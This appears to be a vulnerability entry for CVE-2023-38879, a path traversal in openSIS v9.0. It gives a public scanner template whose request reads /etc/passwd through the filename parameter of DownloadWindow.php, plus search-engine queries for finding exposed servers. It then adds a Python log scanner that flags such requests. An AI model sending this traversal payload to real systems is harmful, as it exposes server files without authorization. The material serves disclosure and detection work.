A path traversal vulnerability exists in openSIS Classic Community Edition v9.0 via the 'filename' parameter in DownloadWindow.php. An unauthenticated remote attacker can exploit this to read arbitrary files on the server by manipulating file paths.
PoC code [public]
```yaml
id: CVE-2023-38879

info:
  name: openSIS v9.0 - Path Traversal
  author: haliteroglu
  severity: high
  description: |
    A path traversal vulnerability exists in openSIS Classic Community Edition v9.0 via the 'filename' parameter in DownloadWindow.php. An unauthenticated remote attacker can exploit this to read arbitrary files on the server by manipulating file paths.
  reference:
    - https://github.com/dub-flow/vulnerability-research/tree/main/CVE-2023-38879
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38879
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-38879
    cwe-id: CWE-22
    epss-score: 0.14502
    epss-percentile: 0.94194
    cpe: cpe:2.3:a:os4ed:opensis:9.0:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: os4ed
    product: opensis
    shodan-query: title:"openSIS"
    fofa-query: title="openSIS"
  tags: cve,cve2023,opensis,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/DownloadWindow.php?filename=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "filename="
          - "text/html"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100dc4fef59c8bfef2aaec25a8c2501c5cfca1117e318497f569dbee5a077e7303c02201a89ec0c6878c7d14c6e8117e4004bf04e7dca160a0bbfaab1f436d8975eb039:922c64590222798bb761d5b6d8e72950
```
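
A defender-side check for the request pattern this template sends, as an added example that is not part of the original page or the template author's code: it scans web access logs for `DownloadWindow.php` requests whose `filename` value contains parent-directory segments and records whether the server answered 200. The log lines are constructed samples, and the combined log format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /DownloadWindow.php?filename=../../../../../../../../etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.23 - - [12/Mar/2024:10:04:10 +0000] "GET /opensis/DownloadWindow.php?filename=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 403 199',
    '192.0.2.10 - - [12/Mar/2024:10:05:44 +0000] "GET /DownloadWindow.php?filename=report_card.pdf HTTP/1.1" 200 52110',
    '192.0.2.11 - - [12/Mar/2024:10:06:01 +0000] "GET /index.php?filename=../x HTTP/1.1" 404 153',
]

# client address, request target and status code from one log line
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3}) ')


def is_traversal(filename):
    """True if the decoded value is absolute or contains a '..' segment."""
    parts = filename.replace("\\", "/").split("/")
    return filename.startswith(("/", "\\")) or ".." in parts


def find_traversal_requests(lines):
    """Return one finding per DownloadWindow.php request with a traversing filename."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        url = urlsplit(target)
        if not url.path.lower().endswith("/downloadwindow.php"):
            continue
        # parse_qs percent-decodes, so %2e%2e%2f is compared as ../
        for value in parse_qs(url.query).get("filename", []):
            if is_traversal(value):
                findings.append({
                    "client": client,
                    "filename": value,
                    "status": status,
                    # 200 is the status the template's matcher also requires
                    "served": status == 200,
                })
    return findings


if __name__ == "__main__":
    for finding in find_traversal_requests(SAMPLE_LOG):
        print(finding)
```

Findings with `served` set to true are the ones to triage first, since the server returned content for a path outside the download directory.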